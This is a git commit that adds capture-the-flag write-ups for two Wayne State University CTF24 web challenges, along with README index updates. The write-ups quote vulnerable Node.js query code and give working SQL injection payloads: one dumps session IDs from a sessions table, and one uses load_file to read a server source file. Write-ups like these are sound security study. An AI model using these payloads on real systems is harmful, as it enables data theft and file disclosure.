feat: added Wayne State University - CTF24
parent
5fd19bd6a5
commit
7ecc0a3c9f
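--- /dev/null
+++ b/PATH_NOT_SHOWN_1
@@ -0,0 +1,84 @@
+# Eat More Cookies (Part 2)
+> `-`
+
+## About the Challenge
+We got a website and also the source code (You can download the source code [here](EatMoreCookiespt2.zip)). Here is the preview of the website
+
+![preview](images/preview.png)
+
+If we check the source code, especially this part:
+
+```js
+app.get("/searchcookies", isAuthenticated, async (req, res, next) => {
+cookies = req.query.cookies;
+
+const query = `SELECT * FROM cookies WHERE flavor = "${cookies}"`;
+
+pool.query(query, (err, result) => {
+if(err){
+return next(err)
+}
+
+return res.status(200).render("index", {cookies: result || []})
+});
+})
+```
+
+The `cookies` parameter is vulnerable to SQL injection, and we can get the flag by accessing `/flag` endpoint
+
+```js
+app.get("/flag", isAdmin, (req, res, next) => {
+
+return res.json({"flag": "WSUCTF{F4ke_Flag}"})
+})
+```
+
+But we need to login as administrator first:
+
+```js
+app.post("/adminLogin", async (req, res, next) => {
+const { username, password } = req.body;
+const query = 'SELECT * FROM users WHERE username = ? LIMIT 1';
+try {
+pool.query(query, [username], async (err, result) => {
+
+user = result[0];
+
+console.log(user);
+
+if(!user){
+return res.json({message: "User not found. Please try again."})
+}
+
+let comparePassword = await bcrypt.compare(password, user.password);
+
+if(username == "Administrator" && comparePassword){
+req.session.username = "Admin";
+req.session.isAdmin = true;
+
+return res.json({"message": "Successfully logged in as adminstrator."})
+} else if(comparePassword){
+return res.json({"message": "You are logged in, but you aren't administrator. You could've used the regular login instead!"})
+} else {
+return res.json({"message": "Invalid username or password. Please try again."})
+}
+})
+} catch (err) {
+return next(err)
+}
+
+})
+```
+
+## How to Solve?
+To solve this chall, im using unintended way. Im using `load_file()` MySQL function to read local file and then read `app.js` file
+
+```
+" union select 1,load_file('/app/src/app.js'),3-- -
+```
+
+![flag](images/flag.png)
+
+```
+WSUCTF{Sess1on_IDs_m4ch_more_v4lner9ble_th9n_I_TH0ught}
+```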
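--- /dev/null
+++ b/PATH_NOT_SHOWN_2
@@ -0,0 +1,51 @@
+# Eat More Cookies
+> `-`
+
+## About the Challenge
+We got a website and also the source code (You can download the source code [here](EatMoreCookies.zip)). Here is the preview of the website
+
+![preview](images/preview.png)
+
+If we check the source code, especially this part:
+
+```js
+app.get("/searchcookies", isAuthenticated, async (req, res, next) => {
+cookies = req.query.cookies;
+
+const query = `SELECT * FROM cookies WHERE flavor = "${cookies}"`;
+
+pool.query(query, (err, result) => {
+if(err){
+return next(err)
+}
+
+return res.status(200).render("index", {cookies: result || []})
+});
+})
+```
+
+The `cookies` paramter is vulnerable to SQL injection, and the flag is inside another table called `sessions`
+
+```js
+try {
+const adminCookieData = {"cookie":{"originalMaxAge":86400000,"expires":"2024-04-20T19:21:29.400Z","httpOnly":true,"path":"/", "sameSite": "lax"},"username":"Admin","isAdmin":true};
+const sessionId = 'WSUCTF{F4ke_Flag}';
+const expirationTimestamp = 1712172179;
+
+const serializedData = JSON.stringify(adminCookieData);
+
+const query = `INSERT INTO sessions (session_id, data, expires) VALUES (?, ?, ?)`;
+```
+
+## How to Solve?
+To get every `session_id` inside `sessions` table, im using this payload:
+
+```
+" union select 1,(select group_concat(session_id) from sessions),3-- -
+```
+
+![flag](images/flag.png)
+
+```
+{WSUCTF24:S3arching_Thr0ugh_Very_Expr3ssive_DBz}
+```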
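--- /dev/null
+++ b/PATH_NOT_SHOWN_3
@@ -0,0 +1,7 @@
+# Wayne State University - CTF24
+CTF writeup for The Wayne State University - CTF24. I took part in this CTF competition with the Heroes Cyber Security team and secured the 1st place out of 75 teams
+
+| Category | Challenge |
+| --- | --- |
+| Web | [Blog](/2024/Wayne%20State%20University%20-%20CTF24/Eat%20More%20Cookies/)
+| Web | [Blog](/2024/Wayne%20State%20University%20-%20CTF24/Eat%20More%20Cookies%20(Part%202)/)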
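--- a/PATH_NOT_SHOWN_4
+++ b/PATH_NOT_SHOWN_4
@@ -11,6 +11,7 @@ There are __551__ CTF writeups that have been made in this repository
 
 | Event Name | Team | Ranking |
 | ---------- | ---- | ------- |
+| Wayne State University - CTF24 | 1 |
 | KnightCTF 2024 | Heroes Cyber Security | 1 |
 | DeconstruCT.F 2023 | aseng_fans_club | 1 |
 | The Odyssey CTF | aseng_fans_club | 1 |
@@ -48,6 +49,7 @@ List of CTF events that i have joined before
 | 0xL4ugh CTF 2024 | Yes |[Link](/2024/0xL4ugh%20CTF%202024/) |
 | UNbreakable International 2024 - Team Phase | Yes |[Link](/2024/UNbreakable%20International%202024%20-%20Team%20Phase/) |
 | SwampCTF 2024 | Yes |[Link](/2024/SwampCTF%202024/) |
+| Wayne State University - CTF24 | Yes |[Link](/2024/Wayne%20State%20University%20-%20CTF24/) |
 
 ### Local Events
 | Event Name | Writeup Available? | Writeup Link |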